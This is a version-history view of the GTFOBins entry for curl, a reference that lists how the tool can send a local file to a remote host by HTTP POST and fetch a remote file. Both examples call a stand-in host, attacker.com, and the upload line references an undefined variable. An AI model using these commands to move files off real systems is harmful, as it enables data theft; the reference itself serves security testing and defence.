GTFOBins.github.io/_gtfobins/curl.md

15 lines
395 B
Markdown
Raw Normal View History

2018-05-21 19:14:41 +00:00
---
functions:
upload:
- description: Send local file with an HTTP POST request.
code: |
2018-05-24 19:59:21 +00:00
URL=http://attacker.com/
2018-05-21 19:14:41 +00:00
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
- description: Fetch a remote file via HTTP GET request.
2018-05-24 19:59:21 +00:00
code: |
URL=http://attacker.com/file_to_get
LFILE=where_to_save
2018-05-21 19:14:41 +00:00
curl $URL -o $LFILE
---